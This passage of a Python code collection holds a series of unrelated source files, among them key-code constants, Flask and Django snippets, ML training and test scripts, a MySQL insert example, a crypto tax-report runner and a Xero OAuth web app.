VK_F3 = 0x72
VK_F4 = 0x73
VK_F5 = 0x74
VK_F6 = 0x75
VK_F7 = 0x76
VK_F8 = 0x77
VK_F9 = 0x78
VK_F10 = 0x79
VK_F11 = 0x7A
VK_F12 = 0x7B
VK_F13 = 0x7C
VK_F14 = 0x7D
VK_F15 = 0x7E
VK_F16 = 0x7F
VK_F17 = 0x80
VK_F18 = 0x81
VK_F19 = 0x82
VK_F20 = 0x83
VK_F21 = 0x84
VK_F22 = 0x85
VK_F23 = 0x86
VK_F24 = 0x87
# if(_WIN32_WINNT >= 0x0604)
"""
/*
* 0x88 - 0x8F : UI navigation
*/
"""
VK_NAVIGATION_VIEW = 0x88
VK_NAVIGATION_MENU = 0x89
VK_NAVIGATION_UP = 0x8A
VK_NAVIGATION_DOWN = 0x8B
VK_NAVIGATION_LEFT = 0x8C
VK_NAVIGATION_RIGHT = 0x8D
VK_NAVIGATION_ACCEPT = 0x8E
VK_NAVIGATION_CANCEL = 0x8F
# endif /* _WIN32_WINNT >= 0x0604 */
VK_NUMLOCK = 0x90
VK_SCROLL = 0x91
"""
/*
* NEC PC-9800 kbd definitions
*/
"""
VK_OEM_NEC_EQUAL = 0x92 # // '=' key on numpad
"""
/*
* Fujitsu/OASYS kbd definitions
*/
"""
VK_OEM_FJ_JISHO = 0x92 # // 'Dictionary' key
VK_OEM_FJ_MASSHOU = 0x93 # // 'Unregister word' key
VK_OEM_FJ_TOUROKU = 0x94 # // 'Register word' key
VK_OEM_FJ_LOYA = 0x95 # // 'Left OYAYUBI' key
VK_OEM_FJ_ROYA = 0x96 # // 'Right OYAYUBI' key
"""
/*
* 0x97 - 0x9F : unassigned
*/
"""
"""
/*
* VK_L* & VK_R* - left and right Alt, Ctrl and Shift virtual keys.
* Used only as parameters to GetAsyncKeyState() and GetKeyState().
* No other API or message will distinguish left and right keys in this way.
*/
"""
VK_LSHIFT = 0xA0
VK_RSHIFT = 0xA1
VK_LCONTROL = 0xA2
VK_RCONTROL = 0xA3
VK_LMENU = 0xA4
VK_RMENU = 0xA5
# if(_WIN32_WINNT >= 0x0500)
VK_BROWSER_BACK = 0xA6
VK_BROWSER_FORWARD = 0xA7
VK_BROWSER_REFRESH = 0xA8
VK_BROWSER_STOP = 0xA9
VK_BROWSER_SEARCH = 0xAA
VK_BROWSER_FAVORITES = 0xAB
VK_BROWSER_HOME = 0xAC
VK_VOLUME_MUTE = 0xAD
VK_VOLUME_DOWN = 0xAE
VK_VOLUME_UP = 0xAF
VK_MEDIA_NEXT_TRACK = 0xB0
VK_MEDIA_PREV_TRACK = 0xB1
VK_MEDIA_STOP = 0xB2
VK_MEDIA_PLAY_PAUSE = 0xB3
VK_LAUNCH_MAIL = 0xB4
VK_LAUNCH_MEDIA_SELECT = 0xB5
VK_LAUNCH_APP1 = 0xB6
VK_LAUNCH_APP2 = 0xB7
# endif /* _WIN32_WINNT >= 0x0500 */
"""
/*
* 0xB8 - 0xB9 : reserved
*/
"""
VK_OEM_1 = 0xBA # // ';:' for US
VK_OEM_PLUS = 0xBB # // '+' any country
VK_OEM_COMMA = 0xBC # // ',' any country
VK_OEM_MINUS = 0xBD # // '-' any country
VK_OEM_PERIOD = 0xBE # // '.' any country
VK_OEM_2 = 0xBF # // '/?' for US
VK_OEM_3 = 0xC0 # // '`~' for US
"""
/*
* 0xC1 - 0xC2 : reserved
*/
"""
# if(_WIN32_WINNT >= 0x0604)
"""
/*
* 0xC3 - 0xDA : Gamepad input
*/
"""
VK_GAMEPAD_A = 0xC3
VK_GAMEPAD_B = 0xC4
VK_GAMEPAD_X = 0xC5
VK_GAMEPAD_Y = 0xC6
VK_GAMEPAD_RIGHT_SHOULDER = 0xC7
VK_GAMEPAD_LEFT_SHOULDER = 0xC8
VK_GAMEPAD_LEFT_TRIGGER = 0xC9
VK_GAMEPAD_RIGHT_TRIGGER = 0xCA
VK_GAMEPAD_DPAD_UP = 0xCB
VK_GAMEPAD_DPAD_DOWN = 0xCC
VK_GAMEPAD_DPAD_LEFT = 0xCD
VK_GAMEPAD_DPAD_RIGHT = 0xCE
VK_GAMEPAD_MENU = 0xCF
VK_GAMEPAD_VIEW = 0xD0
VK_GAMEPAD_LEFT_THUMBSTICK_BUTTON = 0xD1
VK_GAMEPAD_RIGHT_THUMBSTICK_BUTTON = 0xD2
VK_GAMEPAD_LEFT_THUMBSTICK_UP = 0xD3
VK_GAMEPAD_LEFT_THUMBSTICK_DOWN = 0xD4
VK_GAMEPAD_LEFT_THUMBSTICK_RIGHT = 0xD5
VK_GAMEPAD_LEFT_THUMBSTICK_LEFT = 0xD6
VK_GAMEPAD_RIGHT_THUMBSTICK_UP = 0xD7
VK_GAMEPAD_RIGHT_THUMBSTICK_DOWN = 0xD8
VK_GAMEPAD_RIGHT_THUMBSTICK_RIGHT = 0xD9
VK_GAMEPAD_RIGHT_THUMBSTICK_LEFT = 0xDA
# endif /* _WIN32_WINNT >= 0x0604 */
VK_OEM_4 = 0xDB # // '[{' for US
VK_OEM_5 = 0xDC # // '\|' for US
VK_OEM_6 = 0xDD # // ']}' for US
VK_OEM_7 = 0xDE # // ''"' for US
VK_OEM_8 = 0xDF
"""
/*
* 0xE0 : reserved
*/
"""
"""
/*
* Various extended or enhanced keyboards
*/
"""
VK_OEM_AX = 0xE1 # // 'AX' key on Japanese AX kbd
VK_OEM_102 = 0xE2 # // "<>" or "\|" on RT 102-key kbd.
VK_ICO_HELP = 0xE3 # // Help key on ICO
VK_ICO_00 = 0xE4 # // 00 key on ICO
# if(WINVER >= 0x0400)
VK_PROCESSKEY = 0xE5
# endif /* WINVER >= 0x0400 */
VK_ICO_CLEAR = 0xE6
# if(_WIN32_WINNT >= 0x0500)
VK_PACKET = 0xE7
# endif /* _WIN32_WINNT >= 0x0500 */
"""
/*
* 0xE8 : unassigned
*/
"""
"""
/*
* Nokia/Ericsson definitions
*/
"""
VK_OEM_RESET = 0xE9
VK_OEM_JUMP = 0xEA
VK_OEM_PA1 = 0xEB
VK_OEM_PA2 = 0xEC
VK_OEM_PA3 = 0xED
VK_OEM_WSCTRL = 0xEE
VK_OEM_CUSEL = 0xEF
VK_OEM_ATTN = 0xF0
VK_OEM_FINISH = 0xF1
VK_OEM_COPY = 0xF2
VK_OEM_AUTO = 0xF3
VK_OEM_ENLW = 0xF4
VK_OEM_BACKTAB = 0xF5
VK_ATTN = 0xF6
VK_CRSEL = 0xF7
VK_EXSEL = 0xF8
VK_EREOF = 0xF9
VK_PLAY = 0xFA
VK_ZOOM = 0xFB
VK_NONAME = 0xFC
VK_PA1 = 0xFD
VK_OEM_CLEAR = 0xFE
"""
/*
* 0xFF : reserved
*/
"""
# Custom Value Added
VK_DISABLED = 0x100
| 2.09375 | 2 |
application/flicket_errors/__init__.py | abbas0001/flicket | 0 | 16931 | <reponame>abbas0001/flicket
#! python3
# -*- coding: utf-8 -*-
#
from flask import Blueprint
bp_errors = Blueprint('flicket-errors', __name__)
| 1.460938 | 1 |
SmartBuild/modules/migrations/0003_module_shortcut.py | ampamo/smart-build | 0 | 16932 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('modules', '0002_module_floor'),
]
operations = [
migrations.AddField(
model_name='module',
name='shortcut',
field=models.BooleanField(default=False),
),
]
| 1.34375 | 1 |
app/common.py | yxonic/dl-boilerplate | 1 | 16933 | import abc
import argparse
import logging
import pathlib
from collections import namedtuple
from operator import itemgetter
import toml
class NotConfiguredError(Exception):
pass
class ParseError(Exception):
pass
class Model(abc.ABC):
"""Interface for model that can save/load parameters.
Each model class should have an ``_add_argument`` class method to define
model arguments along with their types, default values, etc.
"""
@classmethod
@abc.abstractmethod
def add_arguments(cls, parser: argparse.ArgumentParser):
"""Add arguments to an argparse subparser."""
raise NotImplementedError
@classmethod
def build(cls, **kwargs):
"""Build model. Parameters are specified by keyword arguments.
Example:
>>> from models import Simple
>>> model = Simple.build(foo=3)
>>> print(model.config)
Config(foo=3)
"""
keys, values = zip(*sorted(list(kwargs.items()), key=itemgetter(0)))
config = namedtuple(cls.__name__, keys)(*values)
return cls(config)
@classmethod
def parse(cls, args):
"""Parse command-line options and build model."""
class _ArgumentParser(argparse.ArgumentParser):
def error(self, message):
raise ParseError(message)
parser = _ArgumentParser(prog='', add_help=False)
cls.add_arguments(parser)
args = parser.parse_args(args)
config = dict(args._get_kwargs())
Model._unfold_config(config)
return cls.build(**config)
def __init__(self, config):
"""
Args:
config (namedtuple): model configuration
"""
self.config = config
def __str__(self):
return str(self.config)
@staticmethod
def _unfold_config(cfg):
for k, v in list(cfg.items()):
if isinstance(v, dict):
Model._unfold_config(v)
if '.' not in k:
continue
d = cfg
for sec in k.split('.')[:-1]:
if sec in d:
d = d[sec]
else:
d[sec] = {}
d = d[sec]
d[k.split('.')[-1]] = v
del cfg[k]
class Workspace:
"""Workspace utilities. One can save/load configurations, build models
with specific configuration, save snapshots, open results, etc., using
workspace objects."""
def __init__(self, path: str, model=None, config=None):
self._path = pathlib.Path(path)
self._log_path = self._path / 'log'
self._snapshot_path = self._path / 'snapshot'
self._result_path = self._path / 'result'
if model is None:
self._model_cls = None
self._config = None
return
if config is None:
config = {}
self._set_model(model, config)
self._save()
def __str__(self):
return str(self.path)
def __repr__(self):
return 'Workspace(path=' + str(self.path) + ')'
def _set_model(self, model, config):
if isinstance(model, str):
self._model_cls = Workspace._get_class(model)
else:
self._model_cls = model
self._config = config
@staticmethod
def _get_class(name):
from . import models as mm
return getattr(mm, name)
@property
def path(self):
if not self._path.exists():
self._path.mkdir(parents=True)
return self._path
@property
def result_path(self):
if not self._result_path.exists():
self._result_path.mkdir(parents=True)
return self._result_path
@property
def snapshot_path(self):
if not self._snapshot_path.exists():
self._snapshot_path.mkdir(parents=True)
return self._snapshot_path
@property
def log_path(self):
if not self._log_path.exists():
self._log_path.mkdir(parents=True)
return self._log_path
@property
def model_name(self):
return self.model_cls.__name__
@property
def model_cls(self):
if self._model_cls is not None:
return self._model_cls
self._load()
return self._model_cls
@property
def config(self):
if self._config is not None:
return self._config
self._load()
return self._config
def setup_like(self, model: Model):
"""Configure workspace with configurations from a given model.
Args:
model (Model): model to be used
"""
self._set_model(model.__class__, model.config._asdict())
def build_model(self):
"""Build model according to the configurations in current
workspace."""
return self.model_cls.build(**self.config)
def logger(self, name: str):
"""Get a logger that logs to a file.
Notice that same logger instance is returned for same names.
Args:
name(str): logger name
"""
logger = logging.getLogger(name)
if logger.handlers:
# previously configured, remain unchanged
return logger
fileFormatter = logging.Formatter('%(levelname)s [%(name)s] '
'%(asctime)s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fileHandler = logging.FileHandler(
str(self.log_path / (name + '.log')))
fileHandler.setFormatter(fileFormatter)
logger.addHandler(fileHandler)
return logger
def _load(self):
"""Load configuration."""
try:
cfg = toml.load((self.path / 'config.toml').open())
self._set_model(cfg['model_name'], cfg[cfg['model_name'].lower()])
except (FileNotFoundError, KeyError):
raise NotConfiguredError('config.toml doesn\'t exist or '
'is incomplete')
def _save(self):
"""Save configuration."""
f = (self.path / 'config.toml').open('w')
toml.dump({'model_name': self.model_name,
self.model_name.lower(): self.config}, f)
f.close()
class Command(abc.ABC):
"""Command interface."""
def __init__(self, parser):
self.parser = parser
def _run(self, args):
ws = Workspace(args.workspace)
cmd = args.command
del args.command, args.func, args.workspace
args = {name: value for (name, value) in args._get_kwargs()}
args = namedtuple(cmd.capitalize(), args.keys())(*args.values())
return self.run(ws, args)
@abc.abstractmethod
def run(self, ws, args):
raise NotImplementedError
| 3.34375 | 3 |
training/train_pos_dep.py | ex00/spacy-ru | 0 | 16934 | <reponame>ex00/spacy-ru
from __future__ import unicode_literals, print_function
import sys
from pathlib import Path
import spacy
from spacy.lang.ru import Russian
from spacy.pipeline import Tagger, DependencyParser
from spacy.util import fix_random_seed, set_lang_class
from models.dep import MyDEP
from models.loadvec import get_ft_vec
from models.pos import MyPOS
from models.t2v import build_tok2vec
from training.corpora.syntagrus import get_syntagrus_example, get_syntagrus
from training.trainer import Trainer, Extractor
from utils.corpus import tag_morphology
CFG = {"device": 0, 'verbose': 1}
GPU_1 = "-g1" in sys.argv[1:]
if GPU_1:
CFG["device"] = 1
TESTS = False
spacy.require_gpu(CFG['device'])
TEST_MODE = "--test" in sys.argv[1:]
if TEST_MODE:
SynTagRus = get_syntagrus_example(Path("data/syntagrus/"))
else:
SynTagRus = get_syntagrus(Path("data/syntagrus/"))
def create_pos(nlp, cls=MyPOS, labels=[], **opts):
pos = cls(nlp.vocab, **opts)
for e in labels:
pos.add_label(e, tag_morphology(e))
return pos
def create_dep(nlp, cls=MyDEP, labels=[], **opts):
dep = cls(nlp.vocab, **opts)
# for e in labels:
# dep.add_label(e)
return dep
ft_vectors = get_ft_vec()
tok2vec = build_tok2vec(embed_size=2000, vectors={"word_vectors": ft_vectors})
def smoke_test():
nlp = spacy.blank("ru")
nlp.add_pipe(create_pos(nlp))
nlp.add_pipe(create_dep(nlp))
nlp.vocab.morphology.tag_map.clear()
nlp.begin_training(tok2vec=tok2vec, **CFG)
if TEST_MODE:
print(nlp.pipeline)
dep = nlp.get_pipe('parser')
if TEST_MODE:
print(dep(nlp.tokenizer("приветы всем")))
class Russian2(Russian):
lang = "ru"
def train_spacy(nlp, epochs):
# set_lang_class('ru2', Russian2)
extractor = Extractor()
cfg = {'tok2vec': tok2vec, **CFG}
fix_random_seed()
trainer = Trainer(nlp, SynTagRus.ds_train, SynTagRus.ds_test, extractor, **cfg)
nlp.vocab.morphology.tag_map.clear()
trainer.train(epochs=epochs)
def main():
smoke_test()
nlp = spacy.blank("ru")
nlp.vocab.morphology.tag_map.clear()
nlp.add_pipe(create_pos(nlp, labels=[]))
nlp.add_pipe(create_dep(nlp, labels=[], config={'learn_tokens': False}))
# nlp.add_pipe(create_pos(nlp, cls=Tagger, labels=SynTagRus.pos))
# nlp.add_pipe(create_dep(nlp, cls=DependencyParser, labels=SynTagRus.dep, config={'learn_tokens': False}))
if TEST_MODE:
print(nlp.pipeline)
# nlp.add_pipe(create_pos(nlp, labels=SynTagRus.pos))
# nlp.add_pipe(create_dep(nlp, labels=SynTagRus.dep, config={'learn_tokens': False}))
if TEST_MODE:
train_spacy(nlp, epochs=5)
else:
train_spacy(nlp, epochs=50)
if __name__ == "__main__":
main()
| 2.265625 | 2 |
tests/test_peephole_optimizations.py | capuanob/angr | 0 | 16935 | <filename>tests/test_peephole_optimizations.py
# pylint:disable=missing-class-docstring,no-self-use
import os
import unittest
import archinfo
import ailment
import angr
from angr.analyses.decompiler.peephole_optimizations import ConstantDereferences
test_location = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'binaries', 'tests')
class TestPeepholeOptimizations(unittest.TestCase):
def test_constant_dereference(self):
# a = *(A) :=> a = the variable at at A iff
# - A is a pointer that points to a read-only section.
proj = angr.Project(os.path.join(test_location, "armel", "decompiler", "rm"), auto_load_libs=False)
expr = ailment.Expr.Load(None, ailment.Expr.Const(None, None, 0xa000, proj.arch.bits),
proj.arch.bytes, archinfo.Endness.LE, ins_addr=0x400100)
opt = ConstantDereferences(proj, proj.kb, 0)
optimized = opt.optimize(expr)
assert isinstance(optimized, ailment.Const)
assert optimized.value == 0x183f8
assert optimized.tags.get('ins_addr', None) == 0x400100, "Peephole optimizer lost tags."
# multiple cases that no optimization should happen
# a. Loading a pointer from a writable location
expr = ailment.Expr.Load(None, ailment.Expr.Const(None, None, 0x21df4, proj.arch.bits), 1, archinfo.Endness.LE)
opt = ConstantDereferences(proj, proj.kb, 0)
optimized = opt.optimize(expr)
assert optimized is None
if __name__ == "__main__":
unittest.main()
| 2.28125 | 2 |
PySpace/mysql/mysql_insertdata.py | dralee/LearningRepository | 0 | 16936 | <filename>PySpace/mysql/mysql_insertdata.py
#!/usr/bin/python3
# 文件名:mysql_createtable.py
import pymysql
# 打开数据库连接
db = pymysql.connect('localhost','root','1234','fdtest')
# 使用cursor()方法创建一个游标对象cursor
cursor = db.cursor()
# SQL插入语句
sql = """INSERT INTO EMPLOYEE(
FIRST_NAME,LAST_NAME,AGE,SEX,INCOME)
VALUES('Mac2','Mohan2',20,'M',6000)"""
"""
或
sql = "INSERT INTO EMPLOYEE(FIRST_NAME, \
LAST_NAME, AGE, SEX, INCOME) \
VALUES ('%s', '%s', '%d', '%c', '%d' )" % \
('Mac', 'Mohan', 20, 'M', 2000)
"""
try:
# 执行sql语句
cursor.execute(sql)
# 提交到数据库执行
db.commit()
except:
# 如发生错误则回滚
db.rollback()
# 关闭数据库连接
db.close()
| 3.703125 | 4 |
appleseed_python.py | AllegorithmicSAS/sat-scons | 25 | 16937 | import os
import subprocess
import threading
mutex = threading.Lock()
def render_appleseed(target_file, base_color_tex, normal_tex, roughness_tex, metallic_tex, resolution, appleseed_path):
mutex.acquire()
try:
# Read the template file from disk.
with open("scene_template.appleseed", "r") as file:
project_text = file.read()
# Substitute variables by their values.
project_text = project_text.replace("$baseColorTexturePath", base_color_tex)
project_text = project_text.replace("$normalTexturePath", normal_tex)
project_text = project_text.replace("$roughnessTexturePath", roughness_tex)
project_text = project_text.replace("$metallicTexturePath", metallic_tex)
project_text = project_text.replace("$frameWidth", str(resolution[0]))
project_text = project_text.replace("$frameHeight", str(resolution[1]))
# Write the new project file to disk.
project_file = os.path.splitext(target_file)[0] + ".appleseed"
with open(project_file, "w") as file:
file.write(project_text)
# Invoke appleseed to render the project file.
appleseed_cli_path = os.path.join(appleseed_path, "bin", "appleseed.cli.exe" if os.name == "nt" else "appleseed.cli")
subprocess.check_call([appleseed_cli_path, "--message-verbosity", "error", project_file, "--output", target_file])
except Exception as e:
print("Failed to generate {0} with appleseed: {1}".format(target_file, e))
raise
finally:
mutex.release()
| 2.484375 | 2 |
conjureup/ui/views/credentials.py | iMichka/conjure-up | 1 | 16938 | from ubuntui.utils import Padding
from ubuntui.widgets.hr import HR
from conjureup.app_config import app
from conjureup.ui.views.base import BaseView, SchemaFormView
from conjureup.ui.widgets.selectors import MenuSelectButtonList
class NewCredentialView(SchemaFormView):
title = "New Credential Creation"
def __init__(self, *args, **kwargs):
cloud_type = app.provider.cloud_type.upper()
self.subtitle = "Enter your {} credentials".format(cloud_type)
super().__init__(*args, **kwargs)
class CredentialPickerView(BaseView):
title = "Choose a Credential"
subtitle = "Please select an existing credential, " \
"or choose to add a new one."
footer = 'Please press [ENTER] on highlighted credential to proceed.'
def __init__(self, credentials, default, submit_cb, back_cb):
self.credentials = credentials
self.default = default
self.submit_cb = submit_cb
self.prev_screen = back_cb
super().__init__()
def build_widget(self):
widget = MenuSelectButtonList(self.credentials, self.default)
widget.append(Padding.line_break(""))
widget.append(HR())
widget.append_option("Add a new credential", None)
return widget
def submit(self):
self.submit_cb(self.widget.selected)
| 2.484375 | 2 |
sleekxmpp/plugins/__init__.py | aristanetworks/SleekXMPP | 0 | 16939 | <gh_stars>0
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 <NAME>
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
__all__ = ['xep_0004', 'xep_0012', 'xep_0030', 'xep_0033', 'xep_0045',
'xep_0050', 'xep_0085', 'xep_0092', 'xep_0199', 'gmail_notify',
'xep_0060', 'xep_0202']
| 0.96875 | 1 |
main.py | pwillworth/dfkreport | 11 | 16940 | #!/usr/bin/env python3
import transactions
import taxmap
import db
import settings
import datetime
import argparse
import uuid
import pickle
import jsonpickle
import logging
import logging.handlers
import traceback
def main():
handler = logging.handlers.RotatingFileHandler('../main.log', maxBytes=33554432, backupCount=10)
logging.basicConfig(handlers=[handler], level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logging.info('We got a report request')
parser = argparse.ArgumentParser()
parser.add_argument("wallet", help="The evm compatible wallet address to generate for")
parser.add_argument("startDate", help="The starting date for the report")
parser.add_argument("endDate", help="The ending date for the report")
parser.add_argument("--costbasis", choices=['fifo','lifo','hifo','acb'], help="Method for mapping cost basis to gains")
parser.add_argument("--chains", choices=['1','2','3','4','5','6','7'], help="Bitwise integer of blockchains to include 1=Harmony,2=Avax,4=DFKChain")
args = parser.parse_args()
if args.costbasis == None:
costBasis = 'fifo'
else:
costBasis = args.costbasis
page_size = settings.TX_PAGE_SIZE
txResult = 0
txData = []
moreOptions = db.ReportOptions()
# list of transactions if loaded from file if available, otherwise fetched
reportInfo = db.findReport(args.wallet, args.startDate, args.endDate)
if reportInfo != None and reportInfo[5] > 0 and len(reportInfo[8]) > 0:
includedChains = reportInfo[12]
with open('../transactions/{0}'.format(reportInfo[8]), 'rb') as file:
txData = pickle.load(file)
else:
# generate.py pre-generates report record, but if running outside of that, create one
if reportInfo == None:
generateTime = datetime.datetime.now()
txResult = transactions.getTransactionCount(args.wallet)
includedChains = 1
db.createReport(args.wallet, args.startDate, args.endDate, int(datetime.datetime.timestamp(generateTime)), txResult, costBasis, includedChains, 1)
else:
includedChains = reportInfo[12]
try:
moreOptions = jsonpickle.loads(reportInfo[13])
except Exception as err:
logging.warning('Ignoring failure to load more options, probably old ui not setting it.')
logging.info('Loading transactions list for {0}'.format(args.wallet))
# Scale up default page size for very large accounts
if reportInfo != None and reportInfo[4] > page_size*50:
page_size = min(1000, page_size*5)
try:
txData = transactions.getTransactionList(args.wallet, args.startDate, args.endDate, page_size, includedChains)
except Exception as err:
logging.error('Unexpected Error {0} fetching transaction list, setting report to failure.'.format(err))
traceback.print_exc()
db.updateReportError(args.wallet, args.startDate, args.endDate, 8)
return 1
# The transactions are written to a file and record updated indicate fetching complete
transactionsFile = uuid.uuid4().hex
with open('../transactions/{0}'.format(transactionsFile), 'wb') as f:
pickle.dump(txData, f)
try:
db.completeTransactions(args.wallet, args.startDate, args.endDate, transactionsFile)
except Exception as err:
logging.error('DB report update tx complete failure: {0}'.format(str(err)))
# With transaction list, we now generate the events and tax map
try:
reportData = taxmap.buildTaxMap(txData, args.wallet, datetime.datetime.strptime(args.startDate, '%Y-%m-%d').date(), datetime.datetime.strptime(args.endDate, '%Y-%m-%d').date(), costBasis, includedChains, moreOptions)
except Exception as err:
logging.error('Unexpected Error {0} building tax map, setting report to failure.'.format(err))
traceback.print_exc()
# Set a different code when web3.exceptions.TransactionNotFound
# so we can relay that it is about network rpc issue, try later
if str(err) == "{'message': 'Relay attempts exhausted', 'code': -32050}":
statusCode = 8
elif "Bad Gateway for url" in str(err) or "Service Unavailable" in str(err) or "Max retries exceeded" in str(err):
statusCode = 8
else:
statusCode = 9
try:
db.updateReportError(args.wallet, args.startDate, args.endDate, statusCode)
except Exception as err:
logging.error('DB report update error failure: {0}'.format(str(err)))
return 1
for item in reportData['taxes']:
logging.debug(str(item.__dict__) + '\n')
# The results are written to a file and record updated to notify completion
reportFile = uuid.uuid4().hex
with open('../reports/{0}'.format(reportFile), 'wb') as f:
pickle.dump(reportData, f)
try:
db.completeReport(args.wallet, args.startDate, args.endDate, reportFile)
except Exception as err:
logging.error('DB report update complete failure: {0}'.format(str(err)))
if __name__ == "__main__":
main()
| 2.03125 | 2 |
src/tarski/fstrips/contingent/__init__.py | phoeft670/tarski | 29 | 16941 | from .problem import ContingentProblem as Problem
from .. action import Action
from .sensor import Sensor
from . import errors
| 1.171875 | 1 |
p40-49/p48.py | kbrose/project_euler | 1 | 16942 | sum = 0
for i in xrange(1,1001):
sum = sum + i**i
print sum % 10000000000
| 2.40625 | 2 |
property_proteome/length/run.py | rrazban/proteomevis_scripts | 1 | 16943 | #!/usr/bin/python
help_msg = 'get uniprot length of entire proteome'
import os, sys
CWD = os.getcwd()
UTLTS_DIR = CWD[:CWD.index('proteomevis_scripts')]+'/proteomevis_scripts/utlts'
sys.path.append(UTLTS_DIR)
from parse_user_input import help_message
from read_in_file import read_in
from parse_data import organism
from uniprot_api import UniProtAPI
from output import writeout
def parse_chain_length(words, i, verbose): #put this in class
if len(words)==1: #does not capture UniProt peptide case
if verbose:
print 'No chain found: {0}. Structure is discarded'.format(words)
length = ''
elif '>' in words[i+1]:
length = ''
elif '?' in words[i+1]:
length = ''
elif '?' in words[i] or '<' in words[i]:
if verbose:
print 'No starting residue for chain: {0}'.format(words)
length = int(words[i+1])
else:
length = int(words[i+1]) - int(words[i]) + 1
return length
class UniProtLength():
def __init__(self, verbose, d_ref):
self.verbose = verbose
self.d_ref = d_ref
uniprotapi = UniProtAPI(['id', 'feature(CHAIN)'])
if organism=='new_protherm':
print len(d_ref)
self.labels, self.raw_data = uniprotapi.uniprot_info(d_ref.keys())
else:
self.labels, self.raw_data = uniprotapi.organism_info()
self.d_output = {}
def run(self):
for line in self.raw_data:
words = line.split()
uniprot = words[self.labels.index('Entry')]
if uniprot in self.d_ref:
chain_length_i = self.labels.index('Chain')+1
chain_length = parse_chain_length(words, chain_length_i, self.verbose)
if chain_length:
self.d_output[uniprot] = chain_length
return self.d_output
if __name__ == "__main__":
args = help_message(help_msg, bool_add_verbose = True)
d_ref = read_in('Entry', 'Gene names (ordered locus )', filename = 'proteome')
uniprot_length = UniProtLength(args.verbose, d_ref)
d_output = uniprot_length.run()
if organism!='protherm':
d_output = {d_ref[uniprot]: res for uniprot, res in d_output.iteritems()}
xlabel = 'oln'
else: #not supported for ProTherm
xlabel = 'uniprot'
writeout([xlabel, 'length'], d_output, filename = 'UniProt')
| 2.609375 | 3 |
machine_learning/torch_time_series_forecasting/src/data/dataset.py | iimuz/til | 4 | 16944 | """データセットをダウンロードするためのスクリプトです."""
# default packages
import logging
import pathlib
import traceback
import urllib.request as request
# third party
import pandas as pd
import tqdm as tqdm_std
# my packages
import src.data.directory as directory
# logger
logger = logging.getLogger(__name__)
class TqdmUpTo(tqdm_std.tqdm):
"""Provides `update_to(n)` which uses `tqdm.update(delta_n)`.
Args:
tqdm (tqdm): tqdm
"""
def update_to(self, b: int = 1, bsize: int = 1, tsize: int = None) -> None:
""" update function
Args:
b (int, optional): Number of blocks transferred. Defaults to 1.
bsize (int, optional): Size of each block (in tqdm units). Defaults to 1.
tsize ([type], optional): Total size (in tqdm units). Defaults to None.
"""
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def get_raw_filepath() -> pathlib.Path:
url = get_raw_url()
filepath = directory.get_raw().joinpath(url.split("/")[-1])
return filepath
def get_raw_url() -> str:
url = (
"https://storage.googleapis.com/tensorflow/tf-keras-datasets/"
"jena_climate_2009_2016.csv.zip"
)
return url
def _main() -> None:
"""メインの実行スクリプト."""
logging.basicConfig(level=logging.INFO)
filepath = get_raw_filepath()
if filepath.exists() is False:
url = get_raw_url()
filepath.parent.mkdir(exist_ok=True, parents=True)
with TqdmUpTo(
unit="B", unit_scale=True, miniters=1, desc=filepath.name
) as pbar:
request.urlretrieve(
url, filename=filepath, reporthook=pbar.update_to, data=None
)
else:
logger.info(f"data already exists: {filepath}")
# show dataset description.
df = pd.read_csv(filepath)
logger.info(df.info())
logger.info(df.head())
logger.info(df.tail())
if __name__ == "__main__":
try:
_main()
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
| 2.640625 | 3 |
app.py | aracnid/i-xero | 0 | 16945 | <gh_stars>0
"""Primary application.
"""
import json
import logging
import logging.config
import os
import sys
from flask import url_for, render_template, redirect, request
from i_xero import Xero2
from i_xero.i_flask import FlaskInterface
from utils import jsonify, serialize_model
# initialize logging
# The SlackBot app doesn't handle logging in the same way.
# I tried to pass in a logger object from aracnid_logger,
# but it seems to disable all loggers
logging_filename = os.environ.get('LOGGING_CONFIG_FILE')
command_dir = os.path.dirname(sys.argv[0])
logging_dir = os.path.join(os.getcwd(), command_dir)
logging_path = os.path.join(os.getcwd(), logging_filename)
with open(logging_path, 'rt') as file:
logging_config = json.load(file)
formatter = os.environ.get('LOGGING_FORMATTER')
logging_config['handlers']['console']['formatter'] = formatter
logging.config.dictConfig(logging_config)
env_str = os.environ.get('LOG_UNHANDLED_EXCEPTIONS')
LOG_UNHANDLED_EXCEPTIONS = env_str.lower() in ('true', 'yes') if env_str else False
# configure flask application
flask_app = FlaskInterface(__name__).get_app()
# configure xero application
xero_app = Xero2(flask_app)
@flask_app.route("/")
def index():
xero_access = dict(xero_app.obtain_xero_oauth2_token() or {})
return render_template(
"code.html",
title="Home | oauth token",
code=jsonify(xero_access),
)
@flask_app.route("/login")
def login():
redirect_url = url_for("oauth_callback", _external=True)
response = xero_app.oauth_app.authorize(callback_uri=redirect_url)
return response
@flask_app.route("/callback")
def oauth_callback():
try:
response = xero_app.oauth_app.authorized_response()
except Exception as e:
print(e)
raise
# todo validate state value
if response is None or response.get("access_token") is None:
return "Access denied: response=%s" % response
xero_app.store_xero_oauth2_token(response)
return redirect(url_for("index", _external=True))
@flask_app.route("/logout")
def logout():
xero_app.store_xero_oauth2_token(None)
return redirect(url_for("index", _external=True))
@flask_app.route("/refresh-token")
def refresh_token():
xero_token = xero_app.obtain_xero_oauth2_token()
new_token = xero_app.refresh_token()
return render_template(
"code.html",
title="Xero OAuth2 token",
code=jsonify({"Old Token": xero_token, "New token": new_token}),
sub_title="token refreshed",
)
@flask_app.route("/tenants")
def tenants():
available_tenants = xero_app.get_tenants()
if available_tenants is None:
return redirect(url_for("login", _external=True))
return render_template(
"code.html",
title="Xero Tenants",
code=jsonify(available_tenants),
)
@flask_app.route("/invoices")
def get_invoices():
invoices = xero_app.get_invoices()
if invoices is None:
return redirect(url_for("login", _external=True))
code = serialize_model(invoices)
sub_title = "Total invoices found: {}".format(len(invoices.invoices))
return render_template(
"code.html", title="Invoices", code=code, sub_title=sub_title
)
# start the app locally
if __name__ == '__main__':
flask_app.run(host='localhost', port=5000)
| 2.21875 | 2 |
